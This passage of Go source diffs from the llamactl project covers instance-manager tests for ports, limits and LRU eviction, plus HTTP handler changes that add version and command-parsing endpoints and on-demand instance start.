inst.SetStatus(instance.Running)
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
inst.SetStatus(instance.Stopped)
}
}()
// Try to evict - should fail because no eligible instances
err := manager.EvictLRUInstance()
if err == nil {
t.Error("Expected error when no eligible instances exist")
}
if err.Error() != "failed to find lru instance" {
t.Errorf("Expected 'failed to find lru instance' error, got: %v", err)
}
// Verify all instances are still running
for i, inst := range instances {
if !inst.IsRunning() {
t.Errorf("Expected instance %d to still be running", i+1)
}
}
})
t.Run("mixed instances - evicts only eligible ones", func(t *testing.T) {
manager := createTestManager()
defer manager.Shutdown()
// Create mix of instances: some with timeout enabled, some disabled
validTimeout := 1
zeroTimeout := 0
instWithTimeout := createInstanceWithTimeout(manager, "with-timeout", "/path/to/model-with-timeout.gguf", &validTimeout)
instNoTimeout1 := createInstanceWithTimeout(manager, "no-timeout-1", "/path/to/model-no-timeout1.gguf", &zeroTimeout)
instNoTimeout2 := createInstanceWithTimeout(manager, "no-timeout-2", "/path/to/model-no-timeout2.gguf", nil)
// Set all instances to running
instances := []*instance.Process{instWithTimeout, instNoTimeout1, instNoTimeout2}
for _, inst := range instances {
inst.SetStatus(instance.Running)
inst.UpdateLastRequestTime()
}
defer func() {
// Reset instances to stopped to avoid shutdown panics
for _, inst := range instances {
if inst.IsRunning() {
inst.SetStatus(instance.Stopped)
}
}
}()
// Evict LRU instance - should only consider the one with timeout
err := manager.EvictLRUInstance()
if err != nil {
t.Fatalf("EvictLRUInstance failed: %v", err)
}
// Verify only the instance with timeout was evicted
if instWithTimeout.IsRunning() {
t.Error("Expected with-timeout instance to be stopped after eviction")
}
if !instNoTimeout1.IsRunning() {
t.Error("Expected no-timeout-1 instance to still be running")
}
if !instNoTimeout2.IsRunning() {
t.Error("Expected no-timeout-2 instance to still be running")
}
})
}
// Helper for timeout tests
type MockTimeProvider struct {
currentTime time.Time
mu sync.RWMutex
}
func NewMockTimeProvider(t time.Time) *MockTimeProvider {
return &MockTimeProvider{currentTime: t}
}
func (m *MockTimeProvider) Now() time.Time {
m.mu.RLock()
defer m.mu.RUnlock()
return m.currentTime
}
func (m *MockTimeProvider) SetTime(t time.Time) {
m.mu.Lock()
defer m.mu.Unlock()
m.currentTime = t
}

View File

@@ -1,501 +0,0 @@
package llamactl_test
import (
"strings"
"testing"
llamactl "llamactl/pkg"
)
func TestNewInstanceManager(t *testing.T) {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 5,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
manager := llamactl.NewInstanceManager(config)
if manager == nil {
t.Fatal("NewInstanceManager returned nil")
}
// Test initial state
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected empty instance list, got %d instances", len(instances))
}
}
func TestCreateInstance_Success(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
if instance.Name != "test-instance" {
t.Errorf("Expected instance name 'test-instance', got %q", instance.Name)
}
if instance.Running {
t.Error("New instance should not be running")
}
if instance.GetOptions().Port != 8080 {
t.Errorf("Expected port 8080, got %d", instance.GetOptions().Port)
}
}
func TestCreateInstance_DuplicateName(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create first instance
_, err := manager.CreateInstance("test-instance", options1)
if err != nil {
t.Fatalf("First CreateInstance failed: %v", err)
}
// Try to create duplicate
_, err = manager.CreateInstance("test-instance", options2)
if err == nil {
t.Error("Expected error for duplicate instance name")
}
if !strings.Contains(err.Error(), "already exists") {
t.Errorf("Expected duplicate name error, got: %v", err)
}
}
func TestCreateInstance_MaxInstancesLimit(t *testing.T) {
// Create manager with low max instances limit
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
MaxInstances: 2, // Very low limit for testing
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances up to the limit
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to max instances limit
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when exceeding max instances limit")
}
if !strings.Contains(err.Error(), "maximum number of instances") && !strings.Contains(err.Error(), "limit") {
t.Errorf("Expected max instances error, got: %v", err)
}
}
func TestCreateInstance_PortAssignment(t *testing.T) {
manager := createTestManager()
// Create instance without specifying port
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
instance, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Should auto-assign a port in the range
port := instance.GetOptions().Port
if port < 8000 || port > 9000 {
t.Errorf("Expected port in range 8000-9000, got %d", port)
}
}
func TestCreateInstance_PortConflictDetection(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080, // Explicit port
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model2.gguf",
Port: 8080, // Same port - should conflict
},
}
// Create first instance
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
// Try to create second instance with same port
_, err = manager.CreateInstance("instance2", options2)
if err == nil {
t.Error("Expected error for port conflict")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "conflict") && !strings.Contains(err.Error(), "in use") {
t.Errorf("Expected port conflict error, got: %v", err)
}
}
func TestCreateInstance_MultiplePortAssignment(t *testing.T) {
manager := createTestManager()
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create multiple instances and verify they get different ports
instance1, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
instance2, err := manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
port1 := instance1.GetOptions().Port
port2 := instance2.GetOptions().Port
if port1 == port2 {
t.Errorf("Expected different ports, both got %d", port1)
}
}
func TestCreateInstance_PortExhaustion(t *testing.T) {
// Create manager with very small port range
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 8001}, // Only 2 ports available
MaxInstances: 10, // Higher than available ports
}
manager := llamactl.NewInstanceManager(config)
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options3 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
// Create instances to exhaust all ports
_, err := manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// This should fail due to port exhaustion
_, err = manager.CreateInstance("instance3", options3)
if err == nil {
t.Error("Expected error when ports are exhausted")
}
if !strings.Contains(err.Error(), "port") && !strings.Contains(err.Error(), "available") {
t.Errorf("Expected port exhaustion error, got: %v", err)
}
}
func TestDeleteInstance_PortRelease(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
// Create instance with specific port
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete the instance
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should be able to create new instance with same port
_, err = manager.CreateInstance("new-instance", options)
if err != nil {
t.Errorf("Expected to reuse port after deletion, got error: %v", err)
}
}
func TestGetInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance first
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
created, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Retrieve it
retrieved, err := manager.GetInstance("test-instance")
if err != nil {
t.Fatalf("GetInstance failed: %v", err)
}
if retrieved.Name != created.Name {
t.Errorf("Expected name %q, got %q", created.Name, retrieved.Name)
}
}
func TestGetInstance_NotFound(t *testing.T) {
manager := createTestManager()
_, err := manager.GetInstance("nonexistent")
if err == nil {
t.Error("Expected error for nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestListInstances(t *testing.T) {
manager := createTestManager()
// Initially empty
instances, err := manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 0 {
t.Errorf("Expected 0 instances, got %d", len(instances))
}
// Create some instances
options1 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
options2 := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err = manager.CreateInstance("instance1", options1)
if err != nil {
t.Fatalf("CreateInstance 1 failed: %v", err)
}
_, err = manager.CreateInstance("instance2", options2)
if err != nil {
t.Fatalf("CreateInstance 2 failed: %v", err)
}
// List should return both
instances, err = manager.ListInstances()
if err != nil {
t.Fatalf("ListInstances failed: %v", err)
}
if len(instances) != 2 {
t.Errorf("Expected 2 instances, got %d", len(instances))
}
// Check names are present
names := make(map[string]bool)
for _, instance := range instances {
names[instance.Name] = true
}
if !names["instance1"] || !names["instance2"] {
t.Error("Expected both instance1 and instance2 in list")
}
}
func TestDeleteInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Delete it
err = manager.DeleteInstance("test-instance")
if err != nil {
t.Fatalf("DeleteInstance failed: %v", err)
}
// Should no longer exist
_, err = manager.GetInstance("test-instance")
if err == nil {
t.Error("Instance should not exist after deletion")
}
}
func TestDeleteInstance_NotFound(t *testing.T) {
manager := createTestManager()
err := manager.DeleteInstance("nonexistent")
if err == nil {
t.Error("Expected error for deleting nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
func TestUpdateInstance_Success(t *testing.T) {
manager := createTestManager()
// Create an instance
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
Port: 8080,
},
}
_, err := manager.CreateInstance("test-instance", options)
if err != nil {
t.Fatalf("CreateInstance failed: %v", err)
}
// Update it
newOptions := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/new-model.gguf",
Port: 8081,
},
}
updated, err := manager.UpdateInstance("test-instance", newOptions)
if err != nil {
t.Fatalf("UpdateInstance failed: %v", err)
}
if updated.GetOptions().Model != "/path/to/new-model.gguf" {
t.Errorf("Expected model '/path/to/new-model.gguf', got %q", updated.GetOptions().Model)
}
if updated.GetOptions().Port != 8081 {
t.Errorf("Expected port 8081, got %d", updated.GetOptions().Port)
}
}
func TestUpdateInstance_NotFound(t *testing.T) {
manager := createTestManager()
options := &llamactl.CreateInstanceOptions{
LlamaServerOptions: llamactl.LlamaServerOptions{
Model: "/path/to/model.gguf",
},
}
_, err := manager.UpdateInstance("nonexistent", options)
if err == nil {
t.Error("Expected error for updating nonexistent instance")
}
if !strings.Contains(err.Error(), "not found") {
t.Errorf("Expected 'not found' error, got: %v", err)
}
}
// Helper function to create a test manager with standard config
func createTestManager() llamactl.InstanceManager {
config := llamactl.InstancesConfig{
PortRange: [2]int{8000, 9000},
LogDirectory: "/tmp/test",
MaxInstances: 10,
LlamaExecutable: "llama-server",
DefaultAutoRestart: true,
DefaultMaxRestarts: 3,
DefaultRestartDelay: 5,
}
return llamactl.NewInstanceManager(config)
}

View File

@@ -1,10 +1,17 @@
package llamactl
package server
import (
"bytes"
"encoding/json"
"fmt"
"io"
"llamactl/pkg/backends"
"llamactl/pkg/backends/llamacpp"
"llamactl/pkg/backends/mlx"
"llamactl/pkg/backends/vllm"
"llamactl/pkg/config"
"llamactl/pkg/instance"
"llamactl/pkg/manager"
"net/http"
"os/exec"
"strconv"
@@ -14,27 +21,43 @@ import (
)
type Handler struct {
InstanceManager InstanceManager
config Config
InstanceManager manager.InstanceManager
cfg config.AppConfig
}
func NewHandler(im InstanceManager, config Config) *Handler {
func NewHandler(im manager.InstanceManager, cfg config.AppConfig) *Handler {
return &Handler{
InstanceManager: im,
config: config,
cfg: cfg,
}
}
// HelpHandler godoc
// VersionHandler godoc
// @Summary Get llamactl version
// @Description Returns the version of the llamactl command
// @Tags version
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
w.Header().Set("Content-Type", "text/plain")
fmt.Fprintf(w, "Version: %s\nCommit: %s\nBuild Time: %s\n", h.cfg.Version, h.cfg.CommitHash, h.cfg.BuildTime)
}
}
// LlamaServerHelpHandler godoc
// @Summary Get help for llama server
// @Description Returns the help text for the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Help text"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/help [get]
func (h *Handler) HelpHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/help [get]
func (h *Handler) LlamaServerHelpHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
helpCmd := exec.Command("llama-server", "--help")
output, err := helpCmd.CombinedOutput()
@@ -47,16 +70,16 @@ func (h *Handler) HelpHandler() http.HandlerFunc {
}
}
// VersionHandler godoc
// LlamaServerVersionHandler godoc
// @Summary Get version of llama server
// @Description Returns the version of the llama server command
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "Version information"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/version [get]
func (h *Handler) VersionHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/version [get]
func (h *Handler) LlamaServerVersionHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
versionCmd := exec.Command("llama-server", "--version")
output, err := versionCmd.CombinedOutput()
@@ -69,16 +92,16 @@ func (h *Handler) VersionHandler() http.HandlerFunc {
}
}
// ListDevicesHandler godoc
// LlamaServerListDevicesHandler godoc
// @Summary List available devices for llama server
// @Description Returns a list of available devices for the llama server
// @Tags server
// @Tags backends
// @Security ApiKeyAuth
// @Produces text/plain
// @Success 200 {string} string "List of devices"
// @Failure 500 {string} string "Internal Server Error"
// @Router /server/devices [get]
func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Router /backends/llama-cpp/devices [get]
func (h *Handler) LlamaServerListDevicesHandler() http.HandlerFunc {
return func(w http.ResponseWriter, r *http.Request) {
listCmd := exec.Command("llama-server", "--list-devices")
output, err := listCmd.CombinedOutput()
@@ -97,7 +120,7 @@ func (h *Handler) ListDevicesHandler() http.HandlerFunc {
// @Tags instances
// @Security ApiKeyAuth
// @Produces json
// @Success 200 {array} Instance "List of instances"
// @Success 200 {array} instance.Process "List of instances"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances [get]
func (h *Handler) ListInstances() http.HandlerFunc {
@@ -124,8 +147,8 @@ func (h *Handler) ListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} Instance "Created instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 201 {object} instance.Process "Created instance details"
// @Failure 400 {string} string "Invalid request body"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [post]
@@ -137,13 +160,13 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.CreateInstance(name, &options)
inst, err := h.InstanceManager.CreateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to create instance: "+err.Error(), http.StatusInternalServerError)
return
@@ -151,7 +174,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(http.StatusCreated)
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -165,7 +188,7 @@ func (h *Handler) CreateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Instance details"
// @Success 200 {object} instance.Process "Instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [get]
@@ -177,14 +200,14 @@ func (h *Handler) GetInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -199,8 +222,8 @@ func (h *Handler) GetInstance() http.HandlerFunc {
// @Accept json
// @Produces json
// @Param name path string true "Instance Name"
// @Param options body CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} Instance "Updated instance details"
// @Param options body instance.CreateInstanceOptions true "Instance configuration options"
// @Success 200 {object} instance.Process "Updated instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name} [put]
@@ -212,20 +235,20 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
return
}
var options CreateInstanceOptions
var options instance.CreateInstanceOptions
if err := json.NewDecoder(r.Body).Decode(&options); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
return
}
instance, err := h.InstanceManager.UpdateInstance(name, &options)
inst, err := h.InstanceManager.UpdateInstance(name, &options)
if err != nil {
http.Error(w, "Failed to update instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -239,7 +262,7 @@ func (h *Handler) UpdateInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Started instance details"
// @Success 200 {object} instance.Process "Started instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/start [post]
@@ -251,14 +274,20 @@ func (h *Handler) StartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StartInstance(name)
inst, err := h.InstanceManager.StartInstance(name)
if err != nil {
// Check if error is due to maximum running instances limit
if _, ok := err.(manager.MaxRunningInstancesError); ok {
http.Error(w, err.Error(), http.StatusConflict)
return
}
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -272,7 +301,7 @@ func (h *Handler) StartInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Stopped instance details"
// @Success 200 {object} instance.Process "Stopped instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/stop [post]
@@ -284,14 +313,14 @@ func (h *Handler) StopInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.StopInstance(name)
inst, err := h.InstanceManager.StopInstance(name)
if err != nil {
http.Error(w, "Failed to stop instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -305,7 +334,7 @@ func (h *Handler) StopInstance() http.HandlerFunc {
// @Security ApiKeyAuth
// @Produces json
// @Param name path string true "Instance Name"
// @Success 200 {object} Instance "Restarted instance details"
// @Success 200 {object} instance.Process "Restarted instance details"
// @Failure 400 {string} string "Invalid name format"
// @Failure 500 {string} string "Internal Server Error"
// @Router /instances/{name}/restart [post]
@@ -317,14 +346,14 @@ func (h *Handler) RestartInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.RestartInstance(name)
inst, err := h.InstanceManager.RestartInstance(name)
if err != nil {
http.Error(w, "Failed to restart instance: "+err.Error(), http.StatusInternalServerError)
return
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(instance); err != nil {
if err := json.NewEncoder(w).Encode(inst); err != nil {
http.Error(w, "Failed to encode instance: "+err.Error(), http.StatusInternalServerError)
return
}
@@ -389,13 +418,13 @@ func (h *Handler) GetInstanceLogs() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
logs, err := instance.GetLogs(num_lines)
logs, err := inst.GetLogs(num_lines)
if err != nil {
http.Error(w, "Failed to get logs: "+err.Error(), http.StatusInternalServerError)
return
@@ -426,19 +455,19 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
return
}
instance, err := h.InstanceManager.GetInstance(name)
inst, err := h.InstanceManager.GetInstance(name)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
if !inst.IsRunning() {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
// Get the cached proxy for this instance
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
@@ -453,6 +482,9 @@ func (h *Handler) ProxyToInstance() http.HandlerFunc {
proxyPath = "/" + proxyPath
}
// Update the last request time for the instance
inst.UpdateLastRequestTime()
// Modify the request to remove the proxy prefix
originalPath := r.URL.Path
r.URL.Path = proxyPath
@@ -489,11 +521,11 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
}
openaiInstances := make([]OpenAIInstance, len(instances))
for i, instance := range instances {
for i, inst := range instances {
openaiInstances[i] = OpenAIInstance{
ID: instance.Name,
ID: inst.Name,
Object: "model",
Created: instance.Created,
Created: inst.Created,
OwnedBy: "llamactl",
}
}
@@ -519,7 +551,7 @@ func (h *Handler) OpenAIListInstances() http.HandlerFunc {
// @Accept json
// @Produces json
// @Success 200 "OpenAI response"
// @Failure 400 {string} string "Invalid request body or model name"
// @Failure 400 {string} string "Invalid request body or instance name"
// @Failure 500 {string} string "Internal Server Error"
// @Router /v1/ [post]
func (h *Handler) OpenAIProxy() http.HandlerFunc {
@@ -532,7 +564,7 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
}
r.Body.Close()
// Parse the body to extract model name
// Parse the body to extract instance name
var requestBody map[string]any
if err := json.Unmarshal(bodyBytes, &requestBody); err != nil {
http.Error(w, "Invalid request body", http.StatusBadRequest)
@@ -541,28 +573,59 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
modelName, ok := requestBody["model"].(string)
if !ok || modelName == "" {
http.Error(w, "Model name is required", http.StatusBadRequest)
http.Error(w, "Instance name is required", http.StatusBadRequest)
return
}
// Route to the appropriate instance based on model name
instance, err := h.InstanceManager.GetInstance(modelName)
// Route to the appropriate inst based on instance name
inst, err := h.InstanceManager.GetInstance(modelName)
if err != nil {
http.Error(w, "Failed to get instance: "+err.Error(), http.StatusInternalServerError)
return
}
if !instance.Running {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
if !inst.IsRunning() {
allowOnDemand := inst.GetOptions() != nil && inst.GetOptions().OnDemandStart != nil && *inst.GetOptions().OnDemandStart
if !allowOnDemand {
http.Error(w, "Instance is not running", http.StatusServiceUnavailable)
return
}
if h.InstanceManager.IsMaxRunningInstancesReached() {
if h.cfg.Instances.EnableLRUEviction {
err := h.InstanceManager.EvictLRUInstance()
if err != nil {
http.Error(w, "Cannot start Instance, failed to evict instance "+err.Error(), http.StatusInternalServerError)
return
}
} else {
http.Error(w, "Cannot start Instance, maximum number of instances reached", http.StatusConflict)
return
}
}
// If on-demand start is enabled, start the instance
if _, err := h.InstanceManager.StartInstance(modelName); err != nil {
http.Error(w, "Failed to start instance: "+err.Error(), http.StatusInternalServerError)
return
}
// Wait for the instance to become healthy before proceeding
if err := inst.WaitForHealthy(h.cfg.Instances.OnDemandStartTimeout); err != nil { // 2 minutes timeout
http.Error(w, "Instance failed to become healthy: "+err.Error(), http.StatusServiceUnavailable)
return
}
}
proxy, err := instance.GetProxy()
proxy, err := inst.GetProxy()
if err != nil {
http.Error(w, "Failed to get proxy: "+err.Error(), http.StatusInternalServerError)
return
}
// Update last request time for the instance
inst.UpdateLastRequestTime()
// Recreate the request body from the bytes we read
r.Body = io.NopCloser(bytes.NewReader(bodyBytes))
r.ContentLength = int64(len(bodyBytes))
@@ -570,3 +633,163 @@ func (h *Handler) OpenAIProxy() http.HandlerFunc {
proxy.ServeHTTP(w, r)
}
}
// ParseCommandRequest represents the request body for command parsing
type ParseCommandRequest struct {
Command string `json:"command"`
}
// ParseLlamaCommand godoc
// @Summary Parse llama-server command
// @Description Parses a llama-server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Failure 500 {object} map[string]string "Internal Server Error"
// @Router /backends/llama-cpp/parse-command [post]
func (h *Handler) ParseLlamaCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
w.Header().Set("Content-Type", "application/json")
w.WriteHeader(status)
_ = json.NewEncoder(w).Encode(errorResponse{Error: code, Details: details})
}
return func(w http.ResponseWriter, r *http.Request) {
var req ParseCommandRequest
if err := json.NewDecoder(r.Body).Decode(&req); err != nil {
writeError(w, http.StatusBadRequest, "invalid_request", "Invalid JSON body")
return
}
if strings.TrimSpace(req.Command) == "" {
writeError(w, http.StatusBadRequest, "invalid_command", "Command cannot be empty")
return
}
llamaOptions, err := llamacpp.ParseLlamaCommand(req.Command)
if err != nil {
writeError(w, http.StatusBadRequest, "parse_error", err.Error())
return
}
options := &instance.CreateInstanceOptions{
BackendType: backends.BackendTypeLlamaCpp,
LlamaServerOptions: llamaOptions,
}
w.Header().Set("Content-Type", "application/json")
if err := json.NewEncoder(w).Encode(options); err != nil {
writeError(w, http.StatusInternalServerError, "encode_error", err.Error())
}
}
}
// ParseMlxCommand godoc
// @Summary Parse mlx_lm.server command
// @Description Parses MLX-LM server command string into instance options
// @Tags backends
// @Security ApiKeyAuth
// @Accept json
// @Produce json
// @Param request body ParseCommandRequest true "Command to parse"
// @Success 200 {object} instance.CreateInstanceOptions "Parsed options"
// @Failure 400 {object} map[string]string "Invalid request or command"
// @Router /backends/mlx/parse-command [post]
func (h *Handler) ParseMlxCommand() http.HandlerFunc {
type errorResponse struct {
Error string `json:"error"`
Details string `json:"details,omitempty"`
}
writeError := func(w http.ResponseWriter, status int, code, details string) {
